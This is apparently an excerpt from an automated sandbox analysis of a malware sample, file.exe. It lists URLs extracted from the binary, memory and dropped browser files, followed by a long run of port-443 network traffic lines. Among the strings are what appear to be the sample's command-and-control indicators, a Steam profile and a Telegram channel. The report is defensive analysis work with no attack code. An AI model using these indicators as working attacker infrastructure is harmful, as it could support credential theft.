Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://m.soundcloud.com/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://m.vk.com/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: Cookies.11.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.11.dr	String found in binary or memory: https://msn.comXIDv10
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://music.amazon.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://music.apple.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log0.10.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log5.10.dr, 000003.log9.10.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log5.10.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.10.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 000003.log5.10.dr, 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13377004436387015.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager-journal.10.dr, QuotaManager.10.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.10.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://open.spotify.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_450.6.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://srtb.msn.com/
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199802540894
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0
Source: HCBGDG.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HCBGDG.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCBGDG.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/c
Source: file.exe	String found in binary or memory: https://t.me/fu4chmo
Source: file.exe, 00000000.00000003.2268565103.000000000342A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fu4chmoc
Source: file.exe	String found in binary or memory: https://t.me/fu4chmor08etMozilla/5.0
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://tidal.com/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://vibe.naver.com/today
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: file.exe, 00000000.00000003.2268446600.000000000342A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://web.telegram.org/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://web.whatsapp.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.deezer.com/
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, DHJKJK.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content.js.10.dr, content_new.js.10.dr	String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_450.6.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_450.6.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_450.6.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.instagram.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.last.fm/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.messenger.com
Source: HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2965433979.0000000007F38000.00000004.00000020.00020000.00000000.sdmp, HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2965433979.0000000007F38000.00000004.00000020.00020000.00000000.sdmp, HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2965433979.0000000007F38000.00000004.00000020.00020000.00000000.sdmp, HCBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.office.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.tiktok.com/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://www.youtube.com
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
